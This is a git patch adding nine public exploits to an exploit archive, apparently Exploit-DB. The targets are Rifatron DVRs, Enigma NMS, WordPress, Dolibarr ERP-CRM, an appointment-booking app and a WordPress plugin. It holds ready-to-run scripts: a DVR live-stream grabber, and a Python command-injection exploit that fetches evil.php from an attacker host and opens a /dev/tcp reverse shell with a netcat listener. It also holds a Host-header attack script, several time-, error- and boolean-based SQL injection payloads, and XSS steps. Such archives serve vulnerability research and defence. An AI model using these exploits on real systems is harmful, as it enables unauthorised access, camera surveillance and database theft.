From fcce3705a3422aa883b69ce8880af0b25ee55636 Mon Sep 17 00:00:00 2001 From: Offensive Security Date: Tue, 10 Sep 2019 05:02:21 +0000 Subject: [PATCH] DB: 2019-09-10 9 changes to exploits/shellcodes WordPress 5.2.3 - Cross-Site Host Modification Dolibarr ERP-CRM 10.0.1 - 'elemid' SQL Injection Enigma NMS 65.0.0 - Cross-Site Request Forgery Enigma NMS 65.0.0 - OS Command Injection Enigma NMS 65.0.0 - SQL Injection Online Appointment - SQL Injection Rifatron Intelligent Digital Security System - 'animate.cgi' Stream Disclosure WordPress Plugin Sell Downloads 1.0.86 - Cross-Site Scripting Dolibarr ERP-CRM 10.0.1 - SQL Injection --- exploits/cgi/webapps/47368.sh | 75 ++++++++++++++ exploits/multiple/webapps/47363.html | 69 +++++++++++++ exploits/multiple/webapps/47364.py | 66 +++++++++++++ exploits/multiple/webapps/47365.txt | 23 +++++ exploits/php/webapps/47361.pl | 91 +++++++++++++++++ exploits/php/webapps/47362.txt | 49 ++++++++++ exploits/php/webapps/47366.txt | 39 ++++++++ exploits/php/webapps/47369.txt | 17 ++++ exploits/php/webapps/47370.txt | 140 +++++++++++++++++++++++++++ files_exploits.csv | 9 ++ 10 files changed, 578 insertions(+) create mode 100755 exploits/cgi/webapps/47368.sh create mode 100644 exploits/multiple/webapps/47363.html create mode 100755 exploits/multiple/webapps/47364.py create mode 100644 exploits/multiple/webapps/47365.txt create mode 100755 exploits/php/webapps/47361.pl create mode 100644 exploits/php/webapps/47362.txt create mode 100644 exploits/php/webapps/47366.txt create mode 100644 exploits/php/webapps/47369.txt create mode 100644 exploits/php/webapps/47370.txt diff --git a/exploits/cgi/webapps/47368.sh b/exploits/cgi/webapps/47368.sh new file mode 100755 index 000000000..4bc3182fa --- /dev/null +++ b/exploits/cgi/webapps/47368.sh @@ -0,0 +1,75 @@ +#!/bin/bash +# +# +# Rifatron Intelligent Digital Security System (animate.cgi) Stream Disclosure +# +# +# Vendor: Rifatron Co., Ltd. | SAM MYUNG Co., Ltd. +# Product web page: http://www.rifatron.com +# Affected version: 5brid DVR (HD6-532/516, DX6-516/508/504, MX6-516/508/504, EH6-504) +# 7brid DVR (HD3-16V2, DX3-16V2/08V2/04V2, MX3-08V2/04V2) +# Firmware: <=8.0 (000143) +# +# +# Summary: Rifatron with its roots in Seoul, Korea has been supplying and +# servicing the security market as a leading CCTV/video surveillance security +# system manufacturer, specializing in stand-alone digital video recorder since +# 1998. We are known for marking the first standalone DVR with audio detection +# and 480 frames per secone(fps) and have been focusing on highend products and +# large projects in a variety applications and merket. These include government +# and public services, banking and finance, hotels and entertatinment, retail +# education, industrial and commercial sectors throughout Europe, Middle East, +# the U.S. and Asia. Based on the accumulated know-how in the security industry, +# Rifatron is trying its utmost for the technology development and customer +# satisfaction to be the best security solution company in the world. +# +# Desc: The DVR suffers from an unauthenticated and unauthorized live stream +# disclosure when animate.cgi script is called through Mobile Web Viewer module. +# +# Tested on: Embedded Linux +# Boa/0.94.14rc21 +# +# +# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic +# @zeroscience +# +# +# Advisory ID: ZSL-2019-5532 +# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2019-5532.php +# +# +# 03.09.2019 +# + +#{PoC} +# +set -euo pipefail +IFS=$'\n\t' +if [ "$#" -ne 2 ]; then + echo "Usage: $0 IP:PORT CHANNEL" # Valid channel integers: 0-15 + echo "Ex.: $0 10.9.8.7:65432 10" + exit +fi +IP=$1 +CHANNEL=$2 +HOST="http://$IP/cgi-bin/animate.cgi?$CHANNEL" +STATUS=$(curl -Is http://$IP/mobile_viewer_login.html 2>/dev/null | head -1 | awk -F" " '{print $2}') +if [ "$STATUS" == "404" ]; then + echo "Target not vulnerable!" + exit +fi +echo "Collecting snapshots..." +for x in {1..10}; + do echo -ne $x + curl "$HOST" -o sequence-$x.jpg -#; + sleep 0.6 + done +echo -ne "\nDone." +echo -ne "\nRendering video..." +ffmpeg -t 10 -v quiet -s 352x288 -r 1 -an -i sequence-%01d.jpg -c:v libx264 -vf fps=10 -pix_fmt yuvj422p video.mp4 +echo " done." +echo -ne "\nRunning animation..." +sleep 1 +cvlc video.mp4 --verbose -1 -f vlc://quit +# +#{/PoC} \ No newline at end of file diff --git a/exploits/multiple/webapps/47363.html b/exploits/multiple/webapps/47363.html new file mode 100644 index 000000000..053c7c172 --- /dev/null +++ b/exploits/multiple/webapps/47363.html @@ -0,0 +1,69 @@ +#--------------------------------------------------------------------# +# Exploit Title: Enigma NMS Cross-Site Request Forgery (CSRF) # +# Date: 21 July 2019 # +# Author: Mark Cross (@xerubus | mogozobo.com) # +# Vendor: NETSAS Pty Ltd # +# Vendor Homepage: https://www.netsas.com.au/ # +# Software Link: https://www.netsas.com.au/enigma-nms-introduction/ # +# Version: Enigma NMS 65.0.0 # +# CVE-IDs: CVE-2019-16068 # +# Full write-up: https://www.mogozobo.com/?p=3647 # +#--------------------------------------------------------------------# + _ _ + ___ (~ )( ~) + / \_\ \/ / +| D_ ]\ \/ -= Enigma CSRF by @xerubus =- +| D _]/\ \ -= We all have something to hide =- + \___/ / /\ \\ + (_ )( _) + @Xerubus + +The following CSRF will create a PHP file for executing a reverse shell on port 1337 via the user upload functionality within the NMS web application. + + + + + + + \ No newline at end of file diff --git a/exploits/multiple/webapps/47364.py b/exploits/multiple/webapps/47364.py new file mode 100755 index 000000000..db743e07b --- /dev/null +++ b/exploits/multiple/webapps/47364.py @@ -0,0 +1,66 @@ +#!/usr/bin/python +#--------------------------------------------------------------------# +# Exploit Title: Enigma NMS OS Command Injection # +# NETSAS Pty Ltd Enigma NMS # +# Date: 21 July 2019 # +# Author: Mark Cross (@xerubus | mogozobo.com) # +# Vendor: NETSAS Pty Ltd # +# Vendor Homepage: https://www.netsas.com.au/ # +# Software Link: https://www.netsas.com.au/enigma-nms-introduction/ # +# Version: Enigma NMS 65.0.0 # +# CVE-IDs: CVE-2019-16072 # +# Full write-up: https://www.mogozobo.com/?p=3647 # +#--------------------------------------------------------------------# + +import sys, time, os, subprocess, signal, requests, socket, SocketServer, SimpleHTTPServer, threading + +os.system('clear') + +print("""\ + _ _ + ___ (~ )( ~) + / \_\ \/ / +| D_ ]\ \/ -= Enigma NMS Reverse Shell by @xerubus =- +| D _]/\ \ -= We all have something to hide =- + \___/ / /\ \\ + (_ )( _) + @Xerubus + """) + +enigma_host = raw_input("Enter Enigma NMS IP address:\t") +attack_host = raw_input("Enter Attacker IP address:\t") +rev_sh_port = raw_input("Enter reverse shell port:\t") +web_svr_port = raw_input("Enter web server port:\t\t") +user = raw_input("Enter Username:\t\t\t") +os.system("stty -echo") +password = raw_input("Enter Password (no echo):\t") +os.system("stty echo") + +enigma_url = "http://" + enigma_host + "/cgi-bin/protected/discover_and_manage.cgi?action=snmp_browser&hst_id=none&snmpv3_profile_id=&ip_address=|curl%20" + attack_host + ":" + web_svr_port + "/evil.php|php&snmp_ro_string=public&mib_oid=system&mib_oid_manual=.1.3.6.1.2.1.1&snmp_version=1" +enigma_headers = {"User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate", "Referer": "http://" + attack_host + "/cgi-bin/protected/discover_and_manage.cgi?action=snmp_browser", "Connection": "close", "Upgrade-Insecure-Requests": "1"} + +print "\n\n[+] Building PHP reverse shell" +f=open("evil.php","w") +f.write("& /dev/tcp/" + attack_host + "/" + rev_sh_port + " 0>&1\'\");\n?>\n") +f.close() + +# Create simple webserver hosting evil php file +print "[+] Hosting PHP reverse shell" +web_svr_port = str(web_svr_port) +web_svr = subprocess.Popen(["python", "-m", "SimpleHTTPServer", web_svr_port], stdout=subprocess.PIPE, shell=False, preexec_fn=os.setsid) + +# Create netcat listener +print "[+] Creating listener on port " + rev_sh_port +subprocess.Popen(["nc", "-nvlp", rev_sh_port]) + +# Send payload to Enigma NMS +print "[+] Sending payload\n" +try: + r = requests.get(enigma_url, headers=enigma_headers, auth=(user, password)) +except: + pass + +print "\n[+] Cleaning up mess..." + +# Shut down http server +os.killpg(os.getpgid(web_svr.pid), signal.SIGTERM) \ No newline at end of file diff --git a/exploits/multiple/webapps/47365.txt b/exploits/multiple/webapps/47365.txt new file mode 100644 index 000000000..0cb61aaa9 --- /dev/null +++ b/exploits/multiple/webapps/47365.txt @@ -0,0 +1,23 @@ +#--------------------------------------------------------------------# +# Exploit Title: Enigma NMS search_pattern SQL Injection # +# Date: 21 July 2019 # +# Author: Mark Cross (@xerubus | mogozobo.com) # +# Vendor: NETSAS Pty Ltd # +# Vendor Homepage: https://www.netsas.com.au/ # +# Software Link: https://www.netsas.com.au/enigma-nms-introduction/ # +# Version: Enigma NMS 65.0.0 # +# CVE-IDs: CVE-2019-16065 # +# Full write-up: https://www.mogozobo.com/?p=3647 # +#--------------------------------------------------------------------# + _ _ + ___ (~ )( ~) + / \_\ \/ / +| D_ ]\ \/ -= Enigma SQLi by @xerubus =- +| D _]/\ \ -= We all have something to hide =- + \___/ / /\ \\ + (_ )( _) + @Xerubus + +Request: http:///cgi-bin/protected/manage_hosts_short.cgi?action=search_proceed&search_pattern= +Vulnerable Parameter: search_pattern (GET) +Payload: action=search_proceed&search_pattern=a%' AND SLEEP(5) AND '%'=' \ No newline at end of file diff --git a/exploits/php/webapps/47361.pl b/exploits/php/webapps/47361.pl new file mode 100755 index 000000000..cd46f1626 --- /dev/null +++ b/exploits/php/webapps/47361.pl @@ -0,0 +1,91 @@ +#!/usr/bin/perl -w +# +# Wordpress <= 5.2.3 Remote Cross Site Host Modification Proof Of Concept Demo Exploit +# +# Copyright 2019 (c) Todor Donev +# +# Type: Remote +# Risk: High +# +# Solution: +# Set security headers to web server and no-cache for Cache-Control +# +# Simple Attack Scenarios: +# +# o This attack can bypass Simple WAF to access restricted content on the web server, +# something like phpMyAdmin; +# +# o This attack can deface the vulnerable Wordpress website with content from the default vhost; +# +# Disclaimer: +# This or previous programs are for Educational purpose ONLY. Do not use it without permission. +# The usual disclaimer applies, especially the fact that Todor Donev is not liable for any damages +# caused by direct or indirect use of the information or functionality provided by these programs. +# The author or any Internet provider bears NO responsibility for content or misuse of these programs +# or any derivatives thereof. By using these programs you accept the fact that any damage (dataloss, +# system crash, system compromise, etc.) caused by the use of these programs are not Todor Donev's +# responsibility. +# +# Use them at your own risk! +# +# # Wordpress <= 5.2.3 Remote Cross Site Host Modification Proof Of Concept Demo Exploit +# # ==================================================================================== +# # Author: Todor Donev 2019 (c) +# # > Host => default-vhost.com +# # > User-Agent => Mozilla/5.0 (compatible; Konqueror/3.5; NetBSD 4.0_RC3; X11) KHTML/3.5.7 (like Gecko) +# # > Content-Type => application/x-www-form-urlencoded +# # < Connection => close +# # < Date => Fri, 06 Sep 2019 11:39:43 GMT +# # < Location => https://default-vhost.com/ +# # < Server => nginx +# # < Content-Type => text/html; charset=UTF-8 +# # < Client-Date => Fri, 06 Sep 2019 11:39:43 GMT +# # < Client-Peer => 13.37.13.37:443 +# # < Client-Response-Num => 1 +# # < Client-SSL-Cert-Issuer => /C=US/O=Let's Encrypt/CN=Let's Encrypt Authority X3 +# # < Client-SSL-Cert-Subject => /CN=default-vhost.com +# # < Client-SSL-Cipher => ECDHE-RSA-AES256-GCM-SHA384 +# # < Client-SSL-Socket-Class => IO::Socket::SSL +# # < Client-SSL-Warning => Peer certificate not verified +# # < Client-Transfer-Encoding => chunked +# # < Strict-Transport-Security => max-age=31536000; +# # < X-Powered-By => PHP/7.3.9 +# # < X-Redirect-By => WordPress +# # ==================================================================================== +# +# +# +use strict; +use v5.10; +use HTTP::Request; +use LWP::UserAgent; +use WWW::UserAgent::Random; + + +my $host = shift || ''; +my $attacker = shift || 'default-vhost.com'; + + +say "# Wordpress <= 5.2.3 Remote Cross Site Host Modification Proof Of Concept Demo Exploit +# ==================================================================================== +# Author: Todor Donev 2019 (c) "; +if ($host !~ m/^http/){ +say "# e.g. perl $0 https://target:port/ default-vhost.com"; +exit; +} + +my $user_agent = rand_ua("browsers"); +my $browser = LWP::UserAgent->new( + protocols_allowed => ['http', 'https'], + ssl_opts => { verify_hostname => 0 } + ); + $browser->timeout(10); + $browser->agent($user_agent); + +my $request = HTTP::Request->new (POST => $host,[Content_Type => "application/x-www-form-urlencoded"], " "); +$request->header("Host" => $attacker); +my $response = $browser->request($request); +say "# 401 Unauthorized!\n" and exit if ($response->code eq '401'); +say "# > $_ => ", $request->header($_) for $request->header_field_names; +say "# < $_ => ", $response->header($_) for $response->header_field_names; +say "# ===================================================================================="; \ No newline at end of file diff --git a/exploits/php/webapps/47362.txt b/exploits/php/webapps/47362.txt new file mode 100644 index 000000000..011722ea0 --- /dev/null +++ b/exploits/php/webapps/47362.txt @@ -0,0 +1,49 @@ +# Exploit Title: Dolibarr ERP/CRM - elemid Sql Injection +# Exploit Author: Metin Yunus Kandemir (kandemir) +# Vendor Homepage: https://www.dolibarr.org/ +# Software Link: https://www.dolibarr.org/downloads +# Version: 10.0.1 +# Category: Webapps +# Tested on: Xampp for Linux +# Software Description : Dolibarr ERP & CRM is a modern and easy to use +software package to manage your business... +================================================================== + + +elemid (POST) - Sql injection PoC + + +POST /dolibarr-10.0.1/htdocs/categories/viewcat.php HTTP/1.1 +Host: localhost +User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 +Firefox/60.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Referer: +http://localhost/dolibarr-10.0.1/htdocs/categories/viewcat.php?id=102&type=product&backtopage=%2Fdolibarr-10.0.1%2Fhtdocs%2Fcategories%2Findex.php +Content-Type: application/x-www-form-urlencoded +Content-Length: 143 +Cookie: +DOLSESSID_60ec554596b730ca6f03816d85cd400a=149432620a831537e75f713330bb0b45 +Connection: close +Upgrade-Insecure-Requests: 1 + +token=%242y%2410%24WgwCdl0XwjnGlV3qpQ%2F7zeLEp%2FXFVVoWaj17gXqY2nYZFvG1dlzsS&typeid=product&type=product&id=102&action=addintocategory&elemid=[SQLi] + + + +Parameter: elemid (POST) + Type: error-based + Title: MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP +BY clause (EXTRACTVALUE) + Payload: +token=$2y$10$WgwCdl0XwjnGlV3qpQ/7zeLEp/XFVVoWaj17gXqY2nYZFvG1dlzsS&typeid=product&type=product&id=102&action=addintocategory&elemid=0 +AND EXTRACTVALUE(7549,CONCAT(0x5c,0x71706a7171,(SELECT +(ELT(7549=7549,1))),0x7176787a71)) + + Type: time-based blind + Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) + Payload: +token=$2y$10$WgwCdl0XwjnGlV3qpQ/7zeLEp/XFVVoWaj17gXqY2nYZFvG1dlzsS&typeid=product&type=product&id=102&action=addintocategory&elemid=0 +AND (SELECT 6353 FROM (SELECT(SLEEP(5)))aOzn) \ No newline at end of file diff --git a/exploits/php/webapps/47366.txt b/exploits/php/webapps/47366.txt new file mode 100644 index 000000000..e6140d346 --- /dev/null +++ b/exploits/php/webapps/47366.txt @@ -0,0 +1,39 @@ +# Exploit Title: Online Appointment SQL Injection +# Data: 07.09.2019 +# Exploit Author: mohammad zaheri +# Vendor HomagePage: https://github.com/girish03/Online-Appointment-Booking-System +# Tested on: Windows +# Google Dork: N/A + + +========= +Vulnerable Page: +========= +Online-Appointment-Booking-System-master/signup.php + + +========== +Vulnerable Source: +========== +Line 52: $name=$_POST['fname']; +Line 53: $gender=$_POST['gender']; +Line 54: $dob=$_POST['dob']; +Line 55: $contact=$_POST['contact']; +Line 56: $email=$_POST['email']; +Line 57: $username=$_POST['username']; +Line 58: $password=$_POST['pwd']; +Line 59: $prepeat=$_POST['pwdr']; +Line 62: if (mysqli_query($conn, $sql)) + +========= +POC: +========= +http://site.com/Online-Appointment-Booking-System-master/signup.php?sql=[SQL] + + + +========= +Contact Me : +========= +Telegram : @m_zhrii +Email : neoboy503@gmail.com \ No newline at end of file diff --git a/exploits/php/webapps/47369.txt b/exploits/php/webapps/47369.txt new file mode 100644 index 000000000..e7a022f17 --- /dev/null +++ b/exploits/php/webapps/47369.txt @@ -0,0 +1,17 @@ +# Exploit Title: WordPress Plugin Sell Downloads 1.0.86 - Cross Site Scripting +# Exploit Author: Mr Winst0n +# Author E-mail: manamtabeshekan@gmail.com +# Discovery Date: September 09,2019 +# Vendor Homepage: https://wordpress.dwbooster.com/content-tools/sell-downloads +# Software Link : https://wordpress.org/plugins/sell-downloads/ +# Tested Version: 1.0.86 +# Tested on: Parrot OS, Wordpress 5.1.1 + + +# PoC: +1- Go to "Products for Sale" section +2- Click on "Add New" +3- In opend window click on "Add Comment" +4- Fill comment as "/> or "/> +5- Click on "Publish" (or "Update" if you editing an existing product) +6- You will see a pop-up (also if click on input), Also if you go to product link will see the pop-up. \ No newline at end of file diff --git a/exploits/php/webapps/47370.txt b/exploits/php/webapps/47370.txt new file mode 100644 index 000000000..3301791df --- /dev/null +++ b/exploits/php/webapps/47370.txt @@ -0,0 +1,140 @@ +# Exploit Title: Dolibarr ERP/CRM - Multiple Sql Injection +# Exploit Author: Metin Yunus Kandemir (kandemir) +# Vendor Homepage: https://www.dolibarr.org/ +# Software Link: https://www.dolibarr.org/downloads +# Version: 10.0.1 +# Category: Webapps +# Tested on: Xampp for Linux +# Software Description : Dolibarr ERP & CRM is a modern and easy to use +software package to manage your business... +================================================================== + + +actioncode (POST) - Sql injection PoC + +http request: + +POST /dolibarr-10.0.1/htdocs/comm/action/card.php HTTP/1.1 +Host: localhost +User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 +Firefox/60.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Referer: +http://localhost/dolibarr-10.0.1/htdocs/comm/action/card.php?action=edit&id=774 +Content-Type: application/x-www-form-urlencoded +Content-Length: 610 +Cookie: +DOLSESSID_60ec554596b730ca6f03816d85cd400a=aaf3a3b284478257b59be81cf1a70fc3 +Connection: close +Upgrade-Insecure-Requests: 1 + +token=%242y%2410%24hG2u8WGSj3ynCl99dYPZGejK322YaCxkfSRW%2FIC0mt8vk7%2FGTtU8a&action=update&id=774&ref_ext=&actioncode=[SQLi]&label=Product+created&ap=09%2F05%2F2019&apday=05&apmonth=09&apyear=2019&aphour=16&apmin=59&apsec=10&p2=09%2F05%2F2019&p2day=05&p2month=09&p2year=2019&p2hour=16&p2min=59&p2sec=10&complete=-1&location=&removedassigned=&assignedtouser=-1&socid=-1&projectid=0&priority=&fk_element=178&elementtype=product¬e=Author%3A+admin%3Cbr%3E%0D%0AProduct+created&edit=Save + + + +Parameter: actioncode (POST) + Type: boolean-based blind + Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or +GROUP BY clause + Payload: +token=$2y$10$hG2u8WGSj3ynCl99dYPZGejK322YaCxkfSRW/IC0mt8vk7/GTtU8a&action=update&id=774&ref_ext=&actioncode=AC_OTH_AUTO' +RLIKE (SELECT (CASE WHEN (5096=5096) THEN 0x41435f4f54485f4155544f ELSE +0x28 END))-- +HQaG&label=Product+created&ap=09/05/2019&apday=05&apmonth=09&apyear=2019&aphour=16&apmin=59&apsec=10&p2=09/05/2019&p2day=05&p2month=09&p2year=2019&p2hour=16&p2min=59&p2sec=10&complete=-1&location=&removedassigned=&assignedtouser=-1&socid=-1&projectid=0&priority=&fk_element=178&elementtype=product¬e=Author%3A+admin%3Cbr%3E%0D%0AProduct+created&edit=Save + + Type: error-based + Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP +BY clause (FLOOR) + Payload: +token=$2y$10$hG2u8WGSj3ynCl99dYPZGejK322YaCxkfSRW/IC0mt8vk7/GTtU8a&action=update&id=774&ref_ext=&actioncode=AC_OTH_AUTO' +AND (SELECT 1665 FROM(SELECT COUNT(*),CONCAT(0x716b707871,(SELECT +(ELT(1665=1665,1))),0x7170707071,FLOOR(RAND(0)*2))x FROM +INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- +XqJd&label=Product+created&ap=09/05/2019&apday=05&apmonth=09&apyear=2019&aphour=16&apmin=59&apsec=10&p2=09/05/2019&p2day=05&p2month=09&p2year=2019&p2hour=16&p2min=59&p2sec=10&complete=-1&location=&removedassigned=&assignedtouser=-1&socid=-1&projectid=0&priority=&fk_element=178&elementtype=product¬e=Author%3A+admin%3Cbr%3E%0D%0AProduct+created&edit=Save + + Type: time-based blind + Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) + Payload: +token=$2y$10$hG2u8WGSj3ynCl99dYPZGejK322YaCxkfSRW/IC0mt8vk7/GTtU8a&action=update&id=774&ref_ext=&actioncode=AC_OTH_AUTO' +AND (SELECT 6833 FROM (SELECT(SLEEP(5)))gCwf)-- +jPLl&label=Product+created&ap=09/05/2019&apday=05&apmonth=09&apyear=2019&aphour=16&apmin=59&apsec=10&p2=09/05/2019&p2day=05&p2month=09&p2year=2019&p2hour=16&p2min=59&p2sec=10&complete=-1&location=&removedassigned=&assignedtouser=-1&socid=-1&projectid=0&priority=&fk_element=178&elementtype=product¬e=Author%3A+admin%3Cbr%3E%0D%0AProduct+created&edit=Save + +. +. +. +. +. + +demand_reason_id, availability_id (POST) - Sql injection PoC + +http request: + +POST /dolibarr-10.0.1/htdocs/comm/propal/card.php HTTP/1.1 +Host: localhost +User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 +Firefox/60.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Referer: +http://localhost/dolibarr-10.0.1/htdocs/comm/propal/card.php?action=create&leftmenu=propals +Content-Type: application/x-www-form-urlencoded +Content-Length: 471 +Cookie: +DOLSESSID_60ec554596b730ca6f03816d85cd400a=aaf3a3b284478257b59be81cf1a70fc3 +Connection: close +Upgrade-Insecure-Requests: 1 + +token=%242y%2410%24L49yBo3dzNwsREPqDxRH8uR7HJ4eaM9ULG2yw1XgypioE2XZaw5lK&action=add&ref_client=&socid=140&re=09%2F09%2F2019&reday=09&remonth=09&reyear=2019&duree_validite=15&cond_reglement_id=0&mode_reglement_id=&demand_reason_id=[SQLi]&availability_id=[SQLi]&shipping_method_id=-1&date_livraison=&date_livraisonday=&date_livraisonmonth=&date_livraisonyear=&projectid=0&incoterm_id=0&location_incoterms=&model=azur&multicurrency_code=EUR¬e_public=¬e_private=&createmode=empty + + + +Parameter: demand_reason_id (POST) + Type: boolean-based blind + Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or +GROUP BY clause + Payload: +token=$2y$10$L49yBo3dzNwsREPqDxRH8uR7HJ4eaM9ULG2yw1XgypioE2XZaw5lK&action=add&ref_client=&socid=140&re=09/09/2019&reday=09&remonth=09&reyear=2019&duree_validite=15&cond_reglement_id=0&mode_reglement_id=&demand_reason_id=0 +RLIKE (SELECT (CASE WHEN (8405=8405) THEN 0 ELSE 0x28 +END))&availability_id=0&shipping_method_id=-1&date_livraison=&date_livraisonday=&date_livraisonmonth=&date_livraisonyear=&projectid=0&incoterm_id=0&location_incoterms=&model=azur&multicurrency_code=EUR¬e_public=¬e_private=&createmode=empty + + Type: error-based + Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP +BY clause (FLOOR) + Payload: +token=$2y$10$L49yBo3dzNwsREPqDxRH8uR7HJ4eaM9ULG2yw1XgypioE2XZaw5lK&action=add&ref_client=&socid=140&re=09/09/2019&reday=09&remonth=09&reyear=2019&duree_validite=15&cond_reglement_id=0&mode_reglement_id=&demand_reason_id=0 +OR (SELECT 8076 FROM(SELECT COUNT(*),CONCAT(0x716a626b71,(SELECT +(ELT(8076=8076,1))),0x71787a7871,FLOOR(RAND(0)*2))x FROM +INFORMATION_SCHEMA.PLUGINS GROUP BY +x)a)&availability_id=0&shipping_method_id=-1&date_livraison=&date_livraisonday=&date_livraisonmonth=&date_livraisonyear=&projectid=0&incoterm_id=0&location_incoterms=&model=azur&multicurrency_code=EUR¬e_public=¬e_private=&createmode=empty + +. +. + +Parameter: availability_id (POST) + Type: boolean-based blind + Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or +GROUP BY clause + Payload: +token=$2y$10$L49yBo3dzNwsREPqDxRH8uR7HJ4eaM9ULG2yw1XgypioE2XZaw5lK&action=add&ref_client=&socid=140&re=09/09/2019&reday=09&remonth=09&reyear=2019&duree_validite=15&cond_reglement_id=0&mode_reglement_id=&demand_reason_id=0&availability_id=0 +RLIKE (SELECT (CASE WHEN (6909=6909) THEN 0 ELSE 0x28 +END))&shipping_method_id=-1&date_livraison=&date_livraisonday=&date_livraisonmonth=&date_livraisonyear=&projectid=0&incoterm_id=0&location_incoterms=&model=azur&multicurrency_code=EUR¬e_public=¬e_private=&createmode=empty + + Type: error-based + Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP +BY clause (FLOOR) + Payload: +token=$2y$10$L49yBo3dzNwsREPqDxRH8uR7HJ4eaM9ULG2yw1XgypioE2XZaw5lK&action=add&ref_client=&socid=140&re=09/09/2019&reday=09&remonth=09&reyear=2019&duree_validite=15&cond_reglement_id=0&mode_reglement_id=&demand_reason_id=0&availability_id=0 +OR (SELECT 3789 FROM(SELECT COUNT(*),CONCAT(0x716a626b71,(SELECT +(ELT(3789=3789,1))),0x71787a7871,FLOOR(RAND(0)*2))x FROM +INFORMATION_SCHEMA.PLUGINS GROUP BY +x)a)&shipping_method_id=-1&date_livraison=&date_livraisonday=&date_livraisonmonth=&date_livraisonyear=&projectid=0&incoterm_id=0&location_incoterms=&model=azur&multicurrency_code=EUR¬e_public=¬e_private=&createmode=empty + + Type: time-based blind + Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) + Payload: +token=$2y$10$L49yBo3dzNwsREPqDxRH8uR7HJ4eaM9ULG2yw1XgypioE2XZaw5lK&action=add&ref_client=&socid=140&re=09/09/2019&reday=09&remonth=09&reyear=2019&duree_validite=15&cond_reglement_id=0&mode_reglement_id=&demand_reason_id=0&availability_id=0 +AND (SELECT 9904 FROM +(SELECT(SLEEP(5)))ZKPW)&shipping_method_id=-1&date_livraison=&date_livraisonday=&date_livraisonmonth=&date_livraisonyear=&projectid=0&incoterm_id=0&location_incoterms=&model=azur&multicurrency_code=EUR¬e_public=¬e_private=&createmode=empty \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index 70a3d4ab2..e8bdd9282 100644 --- a/files_exploits.csv +++ b/files_exploits.csv @@ -41708,3 +41708,12 @@ id,file,description,date,author,type,platform,port 47350,exploits/php/webapps/47350.txt,"WordPress Plugin Download Manager 2.9.93 - Cross-Site Scripting",2019-09-04,MgThuraMoeMyint,webapps,php,80 47351,exploits/hardware/webapps/47351.txt,"DASAN Zhone ZNID GPON 2426A EU - Multiple Cross-Site Scripting",2019-09-04,"Adam Ziaja",webapps,hardware,80 47356,exploits/php/webapps/47356.txt,"Inventory Webapp - 'itemquery' SQL injection",2019-09-06,"mohammad zaheri",webapps,php, +47361,exploits/php/webapps/47361.pl,"WordPress 5.2.3 - Cross-Site Host Modification",2019-09-09,"Todor Donev",webapps,php, +47362,exploits/php/webapps/47362.txt,"Dolibarr ERP-CRM 10.0.1 - 'elemid' SQL Injection",2019-09-09,"Metin Yunus Kandemir",webapps,php, +47363,exploits/multiple/webapps/47363.html,"Enigma NMS 65.0.0 - Cross-Site Request Forgery",2019-09-09,mark,webapps,multiple, +47364,exploits/multiple/webapps/47364.py,"Enigma NMS 65.0.0 - OS Command Injection",2019-09-09,mark,webapps,multiple, +47365,exploits/multiple/webapps/47365.txt,"Enigma NMS 65.0.0 - SQL Injection",2019-09-09,mark,webapps,multiple, +47366,exploits/php/webapps/47366.txt,"Online Appointment - SQL Injection",2019-09-09,"mohammad zaheri",webapps,php, +47368,exploits/cgi/webapps/47368.sh,"Rifatron Intelligent Digital Security System - 'animate.cgi' Stream Disclosure",2019-09-09,LiquidWorm,webapps,cgi, +47369,exploits/php/webapps/47369.txt,"WordPress Plugin Sell Downloads 1.0.86 - Cross-Site Scripting",2019-09-09,"Mr Winst0n",webapps,php, +47370,exploits/php/webapps/47370.txt,"Dolibarr ERP-CRM 10.0.1 - SQL Injection",2019-09-09,"Metin Yunus Kandemir",webapps,php,